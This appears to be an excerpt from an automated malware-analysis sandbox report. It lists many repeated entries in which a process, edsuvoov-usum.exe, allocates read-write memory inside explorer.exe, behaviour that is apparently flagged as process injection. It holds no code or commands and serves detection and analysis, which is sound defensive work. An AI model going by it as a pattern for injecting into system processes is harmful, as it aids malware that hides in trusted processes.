Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: F60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BB10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BB30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E430000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E440000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E450000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E460000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E470000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E480000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E490000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E4A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E4B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E690000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E4E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E680000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E6A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E6B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E6C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E6D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E6E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E6F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E700000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E710000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E720000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E730000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E740000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E750000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E760000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E770000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E780000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E790000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E7A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E7B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8340000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 7FE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 86D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 86F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8300000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 83A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8F90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8FA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8FB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8FC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8FD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8FE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 8FF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9000000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9010000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9270000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9280000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9290000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 92A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 92B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 92C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 92D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 92E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 92F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9300000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9310000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9320000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9330000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9350000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9360000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9450000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9460000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9470000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9480000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9490000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 94A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 94B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 94E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 94F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 94D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9500000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9510000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9520000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9530000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9540000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BBC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BBD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BBE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BBF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BC90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BCA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BCB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BCC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BDD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BDE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BDF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BE00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BE10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BD70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BD80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BD90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BE20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BE30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C8C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C8D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BD50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BD60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BDA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BDB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: BDC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C8E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C8F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C900000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C910000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C920000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C930000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C940000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C950000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C960000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C970000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C980000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C990000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C9A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: C9B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E4C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E4D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E840000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E850000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E860000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E870000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E880000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E890000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E8A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E8B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E8C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E8D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E8E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E8F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E900000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E910000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E920000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E930000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E940000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E950000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E960000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E970000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E980000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E990000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E9A0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E9B0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E9C0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E9D0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 83F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: 9340000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E9E0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: E9F0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EA90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EAA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EAB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EAC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EAD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EAE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EAF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EB90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EBA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EBB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EBC0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EBD0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EBE0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EBF0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC00000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC10000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC20000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC30000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC40000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC50000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC60000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC70000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC80000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: EC90000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ECA0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ECB0000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory allocated: C:\Windows\explorer.exe base: ECC0000 protect: page read and writeJump to behavior
